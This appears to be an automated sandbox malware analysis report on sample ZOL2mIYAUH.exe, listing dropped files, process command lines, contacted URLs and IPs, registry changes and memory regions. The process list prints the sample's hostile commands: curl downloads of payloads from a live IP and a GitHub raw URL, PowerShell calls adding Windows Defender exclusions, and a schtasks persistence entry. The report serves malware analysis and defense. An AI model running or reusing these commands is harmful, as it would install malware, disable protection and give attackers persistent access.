Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
ZOL2mIYAUH.exe
|
PE32 executable (console) Intel 80386, for MS Windows
|
initial sample
|
||
C:\Users\Public\winnotify.scr
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\gbcd\ddd.scr
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\gbcd\fff.scr
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\gbcd\qqq.scr
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\gbcd\srtware.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fff.scr.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\winnotify.scr.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0e1vrb2h.sjr.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0hmbazka.220.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2dgfciwj.hbd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2vp55bia.dte.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3yi5zwfi.5h0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b11ftsoy.plq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dche31rq.lni.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ed0e3l02.oeq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ewrwyp5n.x2x.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fdmvsyzb.4pa.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_idspgazx.bcl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_istmp1fy.xbv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4as1qeg.ijg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lmryakuo.fke.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngi1ehjn.fxx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojceuebg.jo1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r3zo0c2a.tp4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgtnypgn.awu.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uidlgze3.pmh.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zq1k4b3s.dwa.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winnotify.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Nov 23 20:41:28
2024, mtime=Sat Nov 23 20:41:28 2024, atime=Sat Nov 23 20:41:28 2024, length=1197056, window=hide
|
dropped
|
||
\Device\ConDrv
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 21 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\ZOL2mIYAUH.exe
|
"C:\Users\user\Desktop\ZOL2mIYAUH.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
|
||
C:\Windows\SysWOW64\curl.exe
|
"curl.exe" -s http://79.110.49.246/didedba/abc -o C:\Users\gbcd\fff.scr
|
||
C:\Windows\SysWOW64\curl.exe
|
"curl.exe" -s http://79.110.49.246/didedba/dddv -o C:\Users\gbcd\qqq.scr
|
||
C:\Windows\SysWOW64\curl.exe
|
"curl.exe" -s http://79.110.49.246/didedba/write -o C:\Users\gbcd\ddd.scr
|
||
C:\Windows\SysWOW64\curl.exe
|
"curl.exe" -s https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exe -o C:\Users\gbcd\srtware.exe
|
||
C:\Users\gbcd\fff.scr
|
"C:\Users\gbcd\fff.scr"
|
||
C:\Users\gbcd\qqq.scr
|
"C:\Users\gbcd\qqq.scr"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\gbcd\qqq.scr'
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'qqq.scr'
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\winnotify.scr'
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'winnotify.scr'
|
||
C:\Windows\SysWOW64\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winnotify" /tr "C:\Users\Public\winnotify.scr"
|
||
C:\Users\Public\winnotify.scr
|
"C:\Users\Public\winnotify.scr" /S
|
||
C:\Users\Public\winnotify.scr
|
"C:\Users\Public\winnotify.scr" /S
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\cmd.exe
|
"cmd.exe" /c mkdir C:\Users\gbcd
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 18 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://79.110.49.246/didedba/dddv
|
79.110.49.246
|
||
http://79.110.49.246/didedba/write
|
79.110.49.246
|
||
http://79.110.49.246/didedba/abc
|
79.110.49.246
|
||
79.110.49.246
|
|||
http://79.110.49.246/didedba/dddvK
|
unknown
|
||
http://79.110.49.246/didedba/writes
|
unknown
|
||
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
https://t.me/
|
unknown
|
||
https://duckduckgo.com/ac/?q=
|
unknown
|
||
http://79.110.49.246/didedba/write-oC:
|
unknown
|
||
http://get.geojs.iod
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
http://79.110.49.246/didedba/dddveW
|
unknown
|
||
http://get.geojs.io
|
unknown
|
||
http://79.110.49.246/didedba/dddvc
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://get.geojs.io
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://scripts.sil.org/OFLCopyright
|
unknown
|
||
https://get.geoj8
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://79.110.49.246/didedba/dddveo
|
unknown
|
||
https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exej
|
unknown
|
||
http://79.110.49.246/didedba/dddves
|
unknown
|
||
https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exeYv
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://t.me/freakcodingspot
|
unknown
|
||
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://t.me/TheDyer
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
http://79.110.49.246/didedba/abcn
|
unknown
|
||
https://www.ecosia.org/newtab/
|
unknown
|
||
http://79.110.49.246/didedba/abck0
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://79.110.49.246/didedba/abce
|
unknown
|
||
http://79.110.49.246/didedba/abccej
|
unknown
|
||
https://ac.ecosia.org/autocomplete?q=
|
unknown
|
||
http://www.typoland.com/)
|
unknown
|
||
http://79.110.49.246/didedba/abc-oC:
|
unknown
|
||
http://crl.micro
|
unknown
|
||
https://go.micr
|
unknown
|
||
http://79.110.49.246/didedba/abck$
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
http://79.110.49.246/didedba/dddv32
|
unknown
|
||
http://79.110.49.246/didedba/dddvce
|
unknown
|
||
http://scripts.sil.org/OFL).http://www.typoland.com/designers/Lukasz_Dziedzic/http://www.typoland.co
|
unknown
|
||
https://get.geojs.io/v1/ip/geo.json
|
104.26.0.100
|
||
https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exe
|
185.199.109.133
|
||
http://www.enigmaprotector.com/
|
unknown
|
||
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
||
http://79.110.49.246/didedba/dddv-oC:
|
unknown
|
||
https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exe-oC:
|
unknown
|
||
https://t.me/webster480
|
unknown
|
||
http://crl.micros
|
unknown
|
There are 51 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
raw.githubusercontent.com
|
185.199.109.133
|
||
get.geojs.io
|
104.26.0.100
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
79.110.49.246
|
unknown
|
Germany
|
||
185.199.109.133
|
raw.githubusercontent.com
|
Netherlands
|
||
127.0.0.1
|
unknown
|
unknown
|
||
104.26.0.100
|
get.geojs.io
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
winnotify
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\fff_RASMANCS
|
FileDirectory
|
There are 6 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
A52000
|
unkown
|
page execute and read and write
|
||
5107000
|
trusted library allocation
|
page read and write
|
||
5352000
|
trusted library allocation
|
page read and write
|
||
618A000
|
trusted library allocation
|
page read and write
|
||
50EF000
|
trusted library allocation
|
page read and write
|
||
60D7000
|
trusted library allocation
|
page read and write
|
||
5273000
|
trusted library allocation
|
page read and write
|
||
5129000
|
trusted library allocation
|
page read and write
|
||
5101000
|
trusted library allocation
|
page read and write
|
||
528D000
|
trusted library allocation
|
page read and write
|
||
4C52000
|
trusted library allocation
|
page read and write
|
||
6227000
|
trusted library allocation
|
page read and write
|
||
511F000
|
trusted library allocation
|
page read and write
|
||
534E000
|
trusted library allocation
|
page read and write
|
||
632A000
|
trusted library allocation
|
page read and write
|
||
452000
|
unkown
|
page execute and read and write
|
||
1C2000
|
unkown
|
page execute and read and write
|
||
50D9000
|
trusted library allocation
|
page read and write
|
||
5963000
|
trusted library allocation
|
page read and write
|
||
4A8E000
|
stack
|
page read and write
|
||
4D5B000
|
trusted library allocation
|
page read and write
|
||
33F5000
|
heap
|
page read and write
|
||
7830000
|
trusted library allocation
|
page read and write
|
||
29B7000
|
stack
|
page read and write
|
||
293E000
|
stack
|
page read and write
|
||
8A30000
|
trusted library allocation
|
page read and write
|
||
8A34000
|
heap
|
page read and write
|
||
32C0000
|
trusted library allocation
|
page read and write
|
||
45E0000
|
trusted library allocation
|
page execute and read and write
|
||
5C41000
|
trusted library allocation
|
page read and write
|
||
72AE000
|
stack
|
page read and write
|
||
76EE000
|
stack
|
page read and write
|
||
6CE0000
|
trusted library allocation
|
page read and write
|
||
77A0000
|
trusted library allocation
|
page read and write
|
||
2FD0000
|
direct allocation
|
page execute and read and write
|
||
8150000
|
trusted library allocation
|
page read and write
|
||
384E000
|
stack
|
page read and write
|
||
726000
|
unkown
|
page execute and read and write
|
||
2FBD000
|
trusted library allocation
|
page execute and read and write
|
||
766E000
|
stack
|
page read and write
|
||
494E000
|
stack
|
page read and write
|
||
766F000
|
stack
|
page read and write
|
||
75F0000
|
trusted library allocation
|
page execute and read and write
|
||
45F0000
|
heap
|
page read and write
|
||
29BD000
|
stack
|
page read and write
|
||
4D0000
|
heap
|
page read and write
|
||
1C0000
|
unkown
|
page readonly
|
||
7140000
|
trusted library allocation
|
page read and write
|
||
72BE000
|
stack
|
page read and write
|
||
33FD000
|
heap
|
page read and write
|
||
413E000
|
stack
|
page read and write
|
||
494B000
|
trusted library allocation
|
page execute and read and write
|
||
30E1000
|
direct allocation
|
page execute and read and write
|
||
239000
|
unkown
|
page execute and read and write
|
||
39AE000
|
stack
|
page read and write
|
||
E1A000
|
heap
|
page read and write
|
||
DDA000
|
heap
|
page read and write
|
||
3710000
|
trusted library allocation
|
page read and write
|
||
343F000
|
stack
|
page read and write
|
||
75A0000
|
trusted library allocation
|
page read and write
|
||
4DD0000
|
trusted library allocation
|
page execute and read and write
|
||
7780000
|
trusted library allocation
|
page read and write
|
||
5692000
|
trusted library allocation
|
page read and write
|
||
2A53000
|
direct allocation
|
page execute and read and write
|
||
32C6000
|
heap
|
page read and write
|
||
834F000
|
stack
|
page read and write
|
||
81C4000
|
heap
|
page read and write
|
||
7DFF000
|
stack
|
page read and write
|
||
73CAD000
|
unkown
|
page read and write
|
||
970E000
|
stack
|
page read and write
|
||
78D0000
|
heap
|
page read and write
|
||
5EA000
|
unkown
|
page execute and read and write
|
||
8FE5000
|
heap
|
page read and write
|
||
5111000
|
trusted library allocation
|
page read and write
|
||
69CB000
|
stack
|
page read and write
|
||
673E000
|
stack
|
page read and write
|
||
7414000
|
heap
|
page read and write
|
||
85E2000
|
trusted library allocation
|
page read and write
|
||
8AE8000
|
heap
|
page read and write
|
||
54F000
|
unkown
|
page execute and read and write
|
||
BDC000
|
unkown
|
page execute and read and write
|
||
884F000
|
heap
|
page read and write
|
||
4F46000
|
trusted library allocation
|
page read and write
|
||
8E20000
|
trusted library allocation
|
page read and write
|
||
2E60000
|
heap
|
page read and write
|
||
2DCD000
|
stack
|
page read and write
|
||
470E000
|
stack
|
page read and write
|
||
465F000
|
stack
|
page read and write
|
||
3440000
|
unclassified section
|
page read and write
|
||
2B6F000
|
heap
|
page read and write
|
||
2C1E000
|
stack
|
page read and write
|
||
44E000
|
stack
|
page read and write
|
||
2BBE000
|
stack
|
page read and write
|
||
8469000
|
heap
|
page read and write
|
||
787000
|
unkown
|
page execute and read and write
|
||
2BC0000
|
heap
|
page read and write
|
||
8210000
|
trusted library allocation
|
page read and write
|
||
A50000
|
unkown
|
page readonly
|
||
2E00000
|
heap
|
page read and write
|
||
19E000
|
stack
|
page read and write
|
||
7F69000
|
trusted library allocation
|
page read and write
|
||
32DA000
|
trusted library allocation
|
page execute and read and write
|
||
35DF000
|
stack
|
page read and write
|
||
71DE000
|
stack
|
page read and write
|
||
30E9000
|
heap
|
page read and write
|
||
5D6A000
|
trusted library allocation
|
page read and write
|
||
7BD0000
|
trusted library allocation
|
page read and write
|
||
2730000
|
heap
|
page read and write
|
||
2E63000
|
heap
|
page read and write
|
||
2F6E000
|
stack
|
page read and write
|
||
2CC0000
|
trusted library allocation
|
page read and write
|
||
2FE0000
|
direct allocation
|
page execute and read and write
|
||
7100000
|
heap
|
page read and write
|
||
2FC9000
|
trusted library allocation
|
page read and write
|
||
8C23000
|
trusted library allocation
|
page read and write
|
||
820A000
|
trusted library allocation
|
page read and write
|
||
7E80000
|
heap
|
page read and write
|
||
53AA000
|
trusted library allocation
|
page read and write
|
||
32E0000
|
trusted library allocation
|
page read and write
|
||
4CA5000
|
heap
|
page execute and read and write
|
||
4E6E000
|
stack
|
page read and write
|
||
7E00000
|
trusted library allocation
|
page read and write
|
||
7E50000
|
trusted library allocation
|
page read and write
|
||
3360000
|
heap
|
page read and write
|
||
33B7000
|
heap
|
page read and write
|
||
3210000
|
trusted library section
|
page read and write
|
||
676000
|
heap
|
page read and write
|
||
3B9E000
|
stack
|
page read and write
|
||
3CDE000
|
stack
|
page read and write
|
||
885D000
|
trusted library allocation
|
page read and write
|
||
452000
|
unkown
|
page execute and read and write
|
||
83F8000
|
heap
|
page read and write
|
||
2CD3000
|
trusted library allocation
|
page execute and read and write
|
||
3420000
|
heap
|
page read and write
|
||
720D000
|
stack
|
page read and write
|
||
4D56000
|
trusted library allocation
|
page read and write
|
||
74E8000
|
heap
|
page read and write
|
||
465E000
|
stack
|
page read and write
|
||
33DE000
|
stack
|
page read and write
|
||
7C10000
|
trusted library allocation
|
page read and write
|
||
5D09000
|
trusted library allocation
|
page read and write
|
||
3E6E000
|
stack
|
page read and write
|
||
A7EE000
|
stack
|
page read and write
|
||
8A2F000
|
trusted library allocation
|
page read and write
|
||
458E000
|
stack
|
page read and write
|
||
3170000
|
heap
|
page read and write
|
||
71CE000
|
stack
|
page read and write
|
||
960000
|
heap
|
page read and write
|
||
533000
|
unkown
|
page execute and read and write
|
||
8F0F000
|
stack
|
page read and write
|
||
2DAE000
|
stack
|
page read and write
|
||
7150000
|
trusted library allocation
|
page read and write
|
||
756E000
|
stack
|
page read and write
|
||
7A6D000
|
stack
|
page read and write
|
||
50D5000
|
trusted library allocation
|
page read and write
|
||
74DE000
|
stack
|
page read and write
|
||
83E000
|
stack
|
page read and write
|
||
3070000
|
heap
|
page read and write
|
||
72F3000
|
trusted library allocation
|
page read and write
|
||
6F9E000
|
stack
|
page read and write
|
||
7B90000
|
trusted library allocation
|
page read and write
|
||
947E000
|
stack
|
page read and write
|
||
8F3D000
|
stack
|
page read and write
|
||
28DE000
|
stack
|
page read and write
|
||
7A02000
|
heap
|
page read and write
|
||
4E5D000
|
trusted library allocation
|
page execute and read and write
|
||
4E56000
|
trusted library allocation
|
page read and write
|
||
126C000
|
heap
|
page read and write
|
||
8810000
|
heap
|
page read and write
|
||
5263000
|
trusted library allocation
|
page read and write
|
||
73DE000
|
stack
|
page read and write
|
||
2CD4000
|
trusted library allocation
|
page read and write
|
||
7540000
|
trusted library allocation
|
page read and write
|
||
7C7A000
|
trusted library allocation
|
page read and write
|
||
1340000
|
heap
|
page read and write
|
||
733E000
|
stack
|
page read and write
|
||
1E8000
|
unkown
|
page execute and read and write
|
||
893A000
|
trusted library allocation
|
page read and write
|
||
7DDF000
|
heap
|
page read and write
|
||
3103000
|
direct allocation
|
page execute and read and write
|
||
2ADA000
|
heap
|
page read and write
|
||
783E000
|
stack
|
page read and write
|
||
4F30000
|
trusted library allocation
|
page execute and read and write
|
||
2922000
|
trusted library allocation
|
page read and write
|
||
880000
|
heap
|
page read and write
|
||
445E000
|
stack
|
page read and write
|
||
712000
|
unkown
|
page execute and read and write
|
||
2D77000
|
heap
|
page read and write
|
||
2B15000
|
heap
|
page read and write
|
||
748B000
|
heap
|
page read and write
|
||
677E000
|
stack
|
page read and write
|
||
556A000
|
trusted library allocation
|
page read and write
|
||
5CF000
|
unkown
|
page execute and read and write
|
||
6D3E000
|
stack
|
page read and write
|
||
7C2D000
|
stack
|
page read and write
|
||
4950000
|
direct allocation
|
page read and write
|
||
A3DF000
|
stack
|
page read and write
|
||
2DCE000
|
stack
|
page read and write
|
||
8E4E000
|
stack
|
page read and write
|
||
4960000
|
trusted library allocation
|
page read and write
|
||
277E000
|
unkown
|
page read and write
|
||
50F0000
|
trusted library allocation
|
page execute and read and write
|
||
5683000
|
trusted library allocation
|
page read and write
|
||
5F71000
|
trusted library allocation
|
page read and write
|
||
4F67000
|
heap
|
page read and write
|
||
40F0000
|
trusted library allocation
|
page read and write
|
||
4C3E000
|
stack
|
page read and write
|
||
5EA7000
|
trusted library allocation
|
page read and write
|
||
E8A000
|
heap
|
page read and write
|
||
46DE000
|
stack
|
page read and write
|
||
739E000
|
stack
|
page read and write
|
||
741A000
|
heap
|
page read and write
|
||
6F4A000
|
stack
|
page read and write
|
||
2CE0000
|
heap
|
page read and write
|
||
89A2000
|
trusted library allocation
|
page read and write
|
||
54B7000
|
trusted library allocation
|
page read and write
|
||
30E3000
|
heap
|
page read and write
|
||
13A6000
|
heap
|
page read and write
|
||
2D70000
|
heap
|
page read and write
|
||
4516000
|
trusted library allocation
|
page read and write
|
||
7D54000
|
heap
|
page read and write
|
||
8780000
|
trusted library allocation
|
page read and write
|
||
4D0C000
|
trusted library allocation
|
page read and write
|
||
2FDA000
|
trusted library allocation
|
page execute and read and write
|
||
4BA8000
|
trusted library allocation
|
page read and write
|
||
739E000
|
stack
|
page read and write
|
||
4ECC000
|
stack
|
page read and write
|
||
7B70000
|
heap
|
page read and write
|
||
78B0000
|
trusted library allocation
|
page execute and read and write
|
||
8A3C000
|
heap
|
page read and write
|
||
32E5000
|
trusted library allocation
|
page execute and read and write
|
||
4DF000
|
unkown
|
page execute and read and write
|
||
77E0000
|
trusted library allocation
|
page read and write
|
||
469E000
|
stack
|
page read and write
|
||
5942000
|
trusted library allocation
|
page read and write
|
||
82B0000
|
heap
|
page read and write
|
||
88E1000
|
heap
|
page read and write
|
||
8F86000
|
heap
|
page read and write
|
||
50F0000
|
heap
|
page execute and read and write
|
||
519F000
|
trusted library allocation
|
page read and write
|
||
2D8E000
|
stack
|
page read and write
|
||
3105000
|
heap
|
page read and write
|
||
4FA4000
|
trusted library allocation
|
page read and write
|
||
3E1E000
|
stack
|
page read and write
|
||
7B7E000
|
heap
|
page read and write
|
||
2A17000
|
heap
|
page read and write
|
||
7B70000
|
heap
|
page read and write
|
||
4CA0000
|
heap
|
page execute and read and write
|
||
7E1D000
|
heap
|
page read and write
|
||
4F5000
|
heap
|
page read and write
|
||
155A000
|
heap
|
page read and write
|
||
4E90000
|
trusted library allocation
|
page read and write
|
||
3105000
|
heap
|
page read and write
|
||
455E000
|
stack
|
page read and write
|
||
2AFA000
|
heap
|
page read and write
|
||
5CA000
|
unkown
|
page execute and read and write
|
||
526E000
|
trusted library allocation
|
page read and write
|
||
7C80000
|
trusted library allocation
|
page read and write
|
||
77AE000
|
stack
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
DD0000
|
heap
|
page read and write
|
||
1340000
|
heap
|
page read and write
|
||
2CE3000
|
heap
|
page read and write
|
||
7DC3000
|
heap
|
page read and write
|
||
8860000
|
trusted library allocation
|
page read and write
|
||
5D01000
|
trusted library allocation
|
page read and write
|
||
4770000
|
heap
|
page execute and read and write
|
||
6F5E000
|
stack
|
page read and write
|
||
4F5000
|
heap
|
page read and write
|
||
2ADA000
|
heap
|
page read and write
|
||
47A0000
|
heap
|
page read and write
|
||
70C0000
|
trusted library allocation
|
page execute and read and write
|
||
4F90000
|
trusted library allocation
|
page execute and read and write
|
||
7C6E000
|
stack
|
page read and write
|
||
2F87000
|
heap
|
page read and write
|
||
3BDF000
|
stack
|
page read and write
|
||
4906000
|
trusted library allocation
|
page read and write
|
||
7FF6000
|
trusted library allocation
|
page read and write
|
||
2CBE000
|
stack
|
page read and write
|
||
89C0000
|
trusted library allocation
|
page execute and read and write
|
||
4A90000
|
direct allocation
|
page read and write
|
||
4F51000
|
trusted library allocation
|
page read and write
|
||
4DDE000
|
stack
|
page read and write
|
||
8630000
|
heap
|
page read and write
|
||
223000
|
unkown
|
page execute and read and write
|
||
8895000
|
heap
|
page read and write
|
||
65F000
|
unkown
|
page execute and read and write
|
||
7BB0000
|
heap
|
page read and write
|
||
836C000
|
heap
|
page read and write
|
||
3030000
|
heap
|
page read and write
|
||
6FD0000
|
heap
|
page read and write
|
||
2A60000
|
direct allocation
|
page execute and read and write
|
||
444E000
|
stack
|
page read and write
|
||
4C41000
|
trusted library allocation
|
page read and write
|
||
4660000
|
trusted library allocation
|
page read and write
|
||
51DB000
|
trusted library allocation
|
page read and write
|
||
2C5F000
|
stack
|
page read and write
|
||
A50000
|
unkown
|
page readonly
|
||
15B4000
|
heap
|
page read and write
|
||
2E67000
|
heap
|
page read and write
|
||
7DE8000
|
heap
|
page read and write
|
||
1313000
|
heap
|
page read and write
|
||
6DFE000
|
stack
|
page read and write
|
||
7C70000
|
trusted library allocation
|
page read and write
|
||
75CE000
|
stack
|
page read and write
|
||
6163000
|
trusted library allocation
|
page read and write
|
||
885000
|
heap
|
page read and write
|
||
12F7000
|
stack
|
page read and write
|
||
6E0E000
|
stack
|
page read and write
|
||
8DDE000
|
stack
|
page read and write
|
||
2F90000
|
direct allocation
|
page execute and read and write
|
||
56F6000
|
trusted library allocation
|
page read and write
|
||
764A000
|
trusted library allocation
|
page read and write
|
||
15B2000
|
heap
|
page read and write
|
||
2DD0000
|
heap
|
page read and write
|
||
314C000
|
heap
|
page read and write
|
||
2BC7000
|
heap
|
page read and write
|
||
8370000
|
trusted library allocation
|
page read and write
|
||
73EE000
|
heap
|
page read and write
|
||
4E7B000
|
trusted library allocation
|
page execute and read and write
|
||
2D2E000
|
stack
|
page read and write
|
||
3290000
|
heap
|
page read and write
|
||
8660000
|
trusted library allocation
|
